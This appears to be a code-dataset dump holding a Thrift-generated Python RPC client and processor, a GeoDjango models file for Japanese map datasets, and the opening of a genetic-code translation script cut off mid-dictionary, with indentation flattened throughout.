oprot.writeStructEnd()
def __repr__(self):
L = []
padding = ' ' * 4
if self.success is not None:
value = pprint.pformat(self.success, indent=0)
value = padding.join(value.splitlines(True))
L.append(' success=%s' % (value))
return "%s(%s)" % (self.__class__.__name__, "\n" + ",\n".join(L) if L else '')
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
# Override the __hash__ function for Python3 - t10434117
if not six.PY2:
__hash__ = object.__hash__
all_structs.append(execute_result)
execute_result.thrift_spec = (
(0, TType.STRUCT, 'success', [ExecutionResponse, ExecutionResponse.thrift_spec, False], None, 2, ), # 0
)
execute_result.thrift_struct_annotations = {
}
execute_result.thrift_field_annotations = {
}
def execute_result__init__(self, success=None,):
self.success = success
execute_result.__init__ = execute_result__init__
def execute_result__setstate__(self, state):
state.setdefault('success', None)
self.__dict__ = state
execute_result.__getstate__ = lambda self: self.__dict__.copy()
execute_result.__setstate__ = execute_result__setstate__
class Client(Iface):
def __enter__(self):
return self
def __exit__(self, type, value, tb):
self._iprot.trans.close()
if self._iprot is not self._oprot:
self._oprot.trans.close()
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot != None:
self._oprot = oprot
self._seqid = 0
def authenticate(self, username=None, password=None):
"""
Parameters:
- username
- password
"""
self.send_authenticate(username, password)
return self.recv_authenticate()
def send_authenticate(self, username=None, password=None):
self._oprot.writeMessageBegin('authenticate', TMessageType.CALL, self._seqid)
args = authenticate_args()
args.username = username
args.password = password
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_authenticate(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = authenticate_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "authenticate failed: unknown result");
def signout(self, sessionId=None):
"""
Parameters:
- sessionId
"""
self.send_signout(sessionId)
def send_signout(self, sessionId=None):
self._oprot.writeMessageBegin('signout', TMessageType.CALL, self._seqid)
args = signout_args()
args.sessionId = sessionId
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.onewayFlush()
def execute(self, sessionId=None, stmt=None):
"""
Parameters:
- sessionId
- stmt
"""
self.send_execute(sessionId, stmt)
return self.recv_execute()
def send_execute(self, sessionId=None, stmt=None):
self._oprot.writeMessageBegin('execute', TMessageType.CALL, self._seqid)
args = execute_args()
args.sessionId = sessionId
args.stmt = stmt
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_execute(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = execute_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "execute failed: unknown result");
class Processor(Iface, TProcessor):
_onewayMethods = ("signout",)
def __init__(self, handler):
TProcessor.__init__(self)
self._handler = handler
self._processMap = {}
self._priorityMap = {}
self._processMap["authenticate"] = Processor.process_authenticate
self._priorityMap["authenticate"] = TPriority.NORMAL
self._processMap["signout"] = Processor.process_signout
self._priorityMap["signout"] = TPriority.NORMAL
self._processMap["execute"] = Processor.process_execute
self._priorityMap["execute"] = TPriority.NORMAL
def onewayMethods(self):
l = []
l.extend(Processor._onewayMethods)
return tuple(l)
@process_main()
def process(self,): pass
@process_method(authenticate_args, oneway=False)
def process_authenticate(self, args, handler_ctx):
result = authenticate_result()
try:
result.success = self._handler.authenticate(args.username, args.password)
except:
ex = sys.exc_info()[1]
self._event_handler.handlerError(handler_ctx, 'authenticate', ex)
result = Thrift.TApplicationException(message=str(ex))
return result
@process_method(signout_args, oneway=True)
def process_signout(self, args, handler_ctx):
try:
self._handler.signout(args.sessionId)
except:
ex = sys.exc_info()[1]
self._event_handler.handlerError(handler_ctx, 'signout', ex)
result = Thrift.TApplicationException(message=str(ex))
@process_method(execute_args, oneway=False)
def process_execute(self, args, handler_ctx):
result = execute_result()
try:
result.success = self._handler.execute(args.sessionId, args.stmt)
except:
ex = sys.exc_info()[1]
self._event_handler.handlerError(handler_ctx, 'execute', ex)
result = Thrift.TApplicationException(message=str(ex))
return result
Iface._processor_type = Processor
class ContextProcessor(ContextIface, TProcessor):
_onewayMethods = ("signout",)
def __init__(self, handler):
TProcessor.__init__(self)
self._handler = handler
self._processMap = {}
self._priorityMap = {}
self._processMap["authenticate"] = ContextProcessor.process_authenticate
self._priorityMap["authenticate"] = TPriority.NORMAL
self._processMap["signout"] = ContextProcessor.process_signout
self._priorityMap["signout"] = TPriority.NORMAL
self._processMap["execute"] = ContextProcessor.process_execute
self._priorityMap["execute"] = TPriority.NORMAL
def onewayMethods(self):
l = []
l.extend(ContextProcessor._onewayMethods)
return tuple(l)
@process_main()
def process(self,): pass
@process_method(authenticate_args, oneway=False)
def process_authenticate(self, args, handler_ctx):
result = authenticate_result()
try:
result.success = self._handler.authenticate(handler_ctx, args.username, args.password)
except Exception:
ex = sys.exc_info()[1]
self._event_handler.handlerError(handler_ctx, 'authenticate', ex)
result = Thrift.TApplicationException(message=str(ex))
return result
@process_method(signout_args, oneway=True)
def process_signout(self, args, handler_ctx):
try:
self._handler.signout(handler_ctx, args.sessionId)
except Exception:
ex = sys.exc_info()[1]
self._event_handler.handlerError(handler_ctx, 'signout', ex)
result = Thrift.TApplicationException(message=str(ex))  # oneway: recorded locally, never sent to the client
@process_method(execute_args, oneway=False)
def process_execute(self, args, handler_ctx):
result = execute_result()
try:
result.success = self._handler.execute(handler_ctx, args.sessionId, args.stmt)
except Exception:
ex = sys.exc_info()[1]
self._event_handler.handlerError(handler_ctx, 'execute', ex)
result = Thrift.TApplicationException(message=str(ex))
return result
ContextIface._processor_type = ContextProcessor
fix_spec(all_structs)
del all_structs
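# ---------------------------------------------------------------------------
# Server sketch (not part of the generated code): wiring Processor to a
# handler, assuming Apache Thrift's blocking TSimpleServer; Handler and the
# port are hypothetical.
#
#   from thrift.transport import TSocket, TTransport
#   from thrift.protocol import TBinaryProtocol
#   from thrift.server import TServer
#
#   processor = Processor(Handler())  # Handler implements Iface
#   server = TServer.TSimpleServer(
#       processor,
#       TSocket.TServerSocket(port=9090),
#       TTransport.TBufferedTransportFactory(),
#       TBinaryProtocol.TBinaryProtocolFactory())
#   server.serve()
# ---------------------------------------------------------------------------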
| [quality-signal columns for the previous record omitted: unlabeled numeric values in this rendering] |
| 077a63095b95d7252e814f38ea45a215a1779bac | 4,280 | py | Python | geodjango/world/models.py | selfsryo/GeoDjangoTutorial @ 73f03f58ca417c06dca1c9275483a24f1134300e | ["Apache-2.0"] | null | null | null |
from django.contrib.gis.db import models
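# NOTE: the cryptic field names below (n03_*, a27_*, p02_*, p11_*) appear to
# be attribute codes carried over from the source shapefiles; the
# verbose_name strings identify each dataset. All geometries use SRID 4326
# (WGS 84).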
class Border(models.Model):
n03_001 = models.CharField(max_length=50, blank=True)
n03_002 = models.CharField(max_length=50, blank=True)
n03_003 = models.CharField(max_length=50, blank=True)
n03_004 = models.CharField(max_length=50, blank=True)
n03_007 = models.CharField(max_length=50, blank=True)
geom = models.PolygonField(srid=4326)
class Meta:
verbose_name = '行政区域データ'  # "administrative area data"
verbose_name_plural = '行政区域データ'
def __str__(self):
return self.n03_004
class School(models.Model):
a27_001 = models.CharField(max_length=50, blank=True)
a27_002 = models.CharField(max_length=50, blank=True)
a27_003 = models.CharField(max_length=50, blank=True)
a27_004 = models.CharField(max_length=50, blank=True)
geom = models.PointField(srid=4326)
class Meta:
verbose_name = '小学校区データ'  # "elementary school district data"
verbose_name_plural = '小学校区データ'
def __str__(self):
return self.a27_003
class Facility(models.Model):
p02_001 = models.CharField(max_length=50, blank=True)
p02_002 = models.CharField(max_length=50, blank=True)
p02_003 = models.CharField(max_length=50, blank=True)
p02_004 = models.CharField(max_length=50, blank=True)
p02_005 = models.CharField(max_length=50, blank=True)
p02_006 = models.CharField(max_length=50, blank=True)
p02_007 = models.CharField(max_length=50, blank=True)
geom = models.PointField(srid=4326)
class Meta:
verbose_name = '公共施設データ'  # "public facility data"
verbose_name_plural = '公共施設データ'
def __str__(self):
return self.p02_004
class Busstop(models.Model):
p11_001 = models.CharField(max_length=256, blank=True)
p11_002 = models.CharField(max_length=256, blank=True)
p11_003_1 = models.CharField(max_length=256, blank=True)
p11_003_2 = models.CharField(max_length=256, blank=True)
p11_003_3 = models.CharField(max_length=256, blank=True)
p11_003_4 = models.CharField(max_length=256, blank=True)
p11_003_5 = models.CharField(max_length=256, blank=True)
p11_003_6 = models.CharField(max_length=256, blank=True)
p11_003_7 = models.CharField(max_length=256, blank=True)
p11_003_8 = models.CharField(max_length=256, blank=True)
p11_003_9 = models.CharField(max_length=256, blank=True)
p11_003_10 = models.CharField(max_length=256, blank=True)
p11_003_11 = models.CharField(max_length=256, blank=True)
p11_003_12 = models.CharField(max_length=256, blank=True)
p11_003_13 = models.CharField(max_length=256, blank=True)
p11_003_14 = models.CharField(max_length=256, blank=True)
p11_003_15 = models.CharField(max_length=256, blank=True)
p11_003_16 = models.CharField(max_length=256, blank=True)
p11_003_17 = models.CharField(max_length=256, blank=True)
p11_003_18 = models.CharField(max_length=256, blank=True)
p11_003_19 = models.CharField(max_length=256, blank=True)
p11_004_1 = models.CharField(max_length=256, blank=True)
p11_004_2 = models.CharField(max_length=256, blank=True)
p11_004_3 = models.CharField(max_length=256, blank=True)
p11_004_4 = models.CharField(max_length=256, blank=True)
p11_004_5 = models.CharField(max_length=256, blank=True)
p11_004_6 = models.CharField(max_length=256, blank=True)
p11_004_7 = models.CharField(max_length=256, blank=True)
p11_004_8 = models.CharField(max_length=256, blank=True)
p11_004_9 = models.CharField(max_length=256, blank=True)
p11_004_10 = models.CharField(max_length=256, blank=True)
p11_004_11 = models.CharField(max_length=256, blank=True)
p11_004_12 = models.CharField(max_length=256, blank=True)
p11_004_13 = models.CharField(max_length=256, blank=True)
p11_004_14 = models.CharField(max_length=256, blank=True)
p11_004_15 = models.CharField(max_length=256, blank=True)
p11_004_16 = models.CharField(max_length=256, blank=True)
p11_004_17 = models.CharField(max_length=256, blank=True)
p11_004_18 = models.CharField(max_length=256, blank=True)
p11_004_19 = models.CharField(max_length=256, blank=True)
geom = models.PointField(srid=4326)
class Meta:
verbose_name = 'バス停留所データ'  # "bus stop data"
verbose_name_plural = 'バス停留所データ'
def __str__(self):
return self.p11_001
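# ---------------------------------------------------------------------------
# Usage sketch (hypothetical, not part of models.py): the PointField and
# PolygonField columns support GeoDjango spatial lookups, e.g. every School
# whose point falls inside a given Border polygon:
#
#   border = Border.objects.get(n03_004='千代田区')  # hypothetical lookup value
#   schools = School.objects.filter(geom__within=border.geom)
# ---------------------------------------------------------------------------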
| [quality-signal columns for the previous record omitted: unlabeled numeric values in this rendering] |
| 077f87612fddd9f1a658353eea59547f5dbdeba2 | 480,209 | py | Python | conservativeRadicalPolymorphismsSubstitutions_v2.py | jsharbrough/conservativeRadicalPolymorphismsSubstitutions @ 2b8fd8bdfb15c9bd0ed6147dd69914ff89274fb3 | ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
import sys
def polSub(fasta,code='invertebrateMt'):
geneticCodes = {'standard':{"TTT":"F", "TTC":"F", "TTA":"L", "TTG":"L", "TCT":"S", "TCC":"S", "TCA":"S", "TCG":"S", "TAT":"Y", "TAC":"Y", "TAA":"*", "TAG":"*", "TGT":"C", "TGC":"C", "TGA":"*", "TGG":"W", "CTT":"L", "CTC":"L", "CTA":"L", "CTG":"L", "CCT":"P", "CCC":"P", "CCA":"P", "CCG":"P", "CAT":"H", "CAC":"H", "CAA":"Q", "CAG":"Q", "CGT":"R", "CGC":"R", "CGA":"R", "CGG":"R", "ATT":"I", "ATC":"I", "ATA":"I", "ATG":"M", "ACT":"T", "ACC":"T", "ACA":"T", "ACG":"T", "AAT":"N", "AAC":"N", "AAA":"K", "AAG":"K", "AGT":"S", "AGC":"S", "AGA":"R", "AGG":"R", "GTT":"V", "GTC":"V", "GTA":"V", "GTG":"V", "GCT":"A", "GCC":"A", "GCA":"A", "GCG":"A", "GAT":"D", "GAC":"D", "GAA":"E", "GAG":"E", "GGT":"G", "GGC":"G", "GGA":"G", "GGG":"G"},'invertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'vertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': '*', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': '*', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'yeastMt':{'CTT': 'T', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'T', 'CTA': 'T', 'CTC': 'T', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'coelenterateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 
'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'ciliateNuc':{'CTT': 'L', 'TAG': 'Q', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Q', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'echinodermMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'euplotidNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'C', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'bacterial':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'yeastNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 
'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'S', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'ascidianMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'G', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'G', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'flatwormMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Y', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'chlorophyceanMt':{'CTT': 'L', 'TAG': 'L', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'trematodeMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 
